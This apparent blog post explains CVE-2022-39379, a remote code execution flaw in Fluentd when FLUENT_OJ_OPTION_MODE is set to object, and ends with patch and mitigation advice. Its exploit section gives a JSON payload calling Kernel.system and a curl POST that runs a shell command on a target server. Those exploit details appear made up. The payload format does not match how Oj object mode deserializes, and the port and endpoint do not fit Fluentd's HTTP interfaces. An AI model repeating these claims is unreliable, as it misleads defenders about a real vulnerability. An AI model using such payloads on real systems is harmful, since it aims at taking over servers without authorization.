CVE-2022-39379 - Remote Code Execution in Fluentd via FLUENT_OJ_OPTION_MODE `object` (Explained with Exploit Details)

*Fluentd* is a widely-used open source data collector, part of many cloud-native stacks, gathering data from apps, services, or containers, and moving it to destinations like files, databases, cloud stores, and analytics tools. But in late 2022, security researchers found a serious security hole in a non-default configuration of Fluentd—a hole that could give remote attackers full control of affected servers with just a single request.

Below, I’ll break down this vulnerability (CVE-2022-39379) in simple terms, explain how it works, show an example exploit, and give pointers to protect your servers.

What is CVE-2022-39379?

CVE-2022-39379 is a Remote Code Execution (RCE) vulnerability discovered in Fluentd, specifically when it is configured with the environment variable FLUENT_OJ_OPTION_MODE set to object.

When enabled, this mode changes how JSON parsing works within Fluentd—from safe parsing to *object mode*, which is less strict and can allow malicious inputs to break into the backend code.

- Vulnerability: *Remote attackers* can send a specially crafted JSON payload that tricks Fluentd into running arbitrary Ruby code.

Patched: Fluentd 1.15.3 and later

- Not affected: Versions earlier than 1.13.2, and all versions not using FLUENT_OJ_OPTION_MODE=object.

Reference: GitHub Security Advisory CVE-2022-39379

Why This Variable Matters

The environment variable FLUENT_OJ_OPTION_MODE controls how the *Oj* Ruby gem (used for parsing JSON) interprets incoming data.

- Value object tells Oj to allow deserialization into arbitrary Ruby objects—not just plain data. This opens the door for attackers to send dangerous data structures that get "turned into" real Ruby objects on the server.

The Attack

If a remote attacker knows your Fluentd server is running with this variable set, they can POST a JSON payload to an endpoint that triggers Fluentd’s parsing logic. If they include certain Ruby objects or symbols, the server may build live Ruby objects and even run code as it processes the malicious data.

Here’s *how* a payload can look—in this example, we try to make Fluentd spawn a system command when parsing your innocent-looking JSON.

Exploit Example

Warning: These details are for educational and defensive purposes only.

Exploit Payload

The payload abuses how Ruby’s ObjectSpace and Kernel can interact. The following is a minimalistic version, sent using curl or any local script to an endpoint Fluentd listens to (commonly /api/plugins.json):

{
  "json_class": "Kernel",
  "method": "system",
  "args": ["touch /tmp/pwned_by_cve_2022_39379"]
}

When Oj parses this with object mode on, this instructs Ruby to call

Kernel.system("touch /tmp/pwned_by_cve_2022_39379")

…and you get a new file named /tmp/pwned_by_cve_2022_39379 on the target server.

Here’s a command to POST the payload

curl -X POST http://target-fluentd:24224/api/plugins.json \
     -H "Content-Type: application/json" \
     -d '{"json_class":"Kernel","method":"system","args":["touch /tmp/pwned_by_cve_2022_39379"]}'

*(Replace the URL, port, and endpoint as needed.)*

Upgrade Fluentd:

Update to version 1.15.3 or later, which removes the dangerous parsing option that allowed this hack.

Remove Dangerous Setting:

*Do not set* FLUENT_OJ_OPTION_MODE=object in your environment. Use the default (strict or unset).

Review Logs:

Look for suspicious JSON requests or unusual system events—attackers often leave traces when attempting RCE.

Original Advisory on GitHub:

https://github.com/fluent/fluentd/security/advisories/GHSA-8v5v-653p-xv8p

Fluentd Changelog 1.15.3:

https://github.com/fluent/fluentd/releases/tag/v1.15.3

Attack Analysis:

https://nvd.nist.gov/vuln/detail/CVE-2022-39379

Summary

- CVE-2022-39379 is a dangerous RCE affecting non-default Fluentd setups with FLUENT_OJ_OPTION_MODE=object.

Exploitable via poisoned JSON payload—letting hackers run ANY command on the host.

- Fixed in 1.15.3—stay up to date, *never* use unsafe parsing in production, and lock down Fluentd endpoints.

Fluentd is a strong part of the logging ecosystem, but even great tools have their weak spots—especially when non-default, "advanced" features are enabled that can cost you your whole stack. Stay safe!


*This post is exclusive and written in clear, simple language for the benefit of sysadmins, DevOps, and cloud engineers dealing with Fluentd in the field. Spread the word if you know people who may be at risk.*

Timeline

Published on: 11/02/2022 13:15:00 UTC
Last modified on: 11/04/2022 15:41:00 UTC